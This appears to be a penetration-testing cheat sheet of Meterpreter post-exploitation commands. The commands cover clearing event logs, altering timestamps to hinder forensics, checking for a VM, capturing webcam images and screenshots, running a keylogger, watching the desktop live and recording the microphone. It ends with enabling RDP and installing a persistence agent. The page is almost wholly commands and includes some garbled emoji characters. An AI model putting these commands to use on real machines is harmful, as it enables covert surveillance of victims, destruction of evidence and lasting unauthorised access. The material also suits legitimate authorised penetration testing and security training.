Meterpreter post-exploitation commands
You can pivot using a SOCKS proxy server.
- β‘οΈ |
root. Clear logs
meterpreter> clearev
- β‘οΈ |
root. Mess with timestamp to complicate forensics
meterpreter> timestomp
- β‘οΈ |
not tested. Check if we are in a VM
meterpreter> run post/windows/gather/checkvm
- β‘οΈ Resolve a host from a name (get IP from hostname)
meterpreter> resolve hostname
- β‘οΈ Random commands
meterpreter> idletime # time the host was idle
meterpreter> ipconfig # network information
meterpreter> localtime # time and date
meterpreter> getenv PATH # get PATH
meterpreter> checksum <file> # get file checksum
All the commands below require administrative/root privileges.
Take control of the webcam
meterpreter> webcam_list
meterpreter> webcam_snap
Take a screenshot
meterpreter> migrate -N explorer.exe
meterpreter> use espia
meterpreter> screengrab
You may also use screenshot π.
Install a keylogger
meterpreter> migrate -N explorer.exe
meterpreter> keyscan_start # start
meterpreter> keyscan_dump # dump keys
Watch the screen in real time
Watch the remote user desktop in real time
meterpreter> screenshare
meterpreter> record_mic # Record audio from the default microphone for X seconds
Record microphone
Record audio from the default microphone for X seconds
meterpreter> record_mic
Enable Remote Desktop Protocol
meterpreter> run post/windows/manage/enable_rdp
Persistence
See METERPRETER SERVICE.
meterpreter> # Automatically start the agent when the system boots
meterpreter> run persistence -X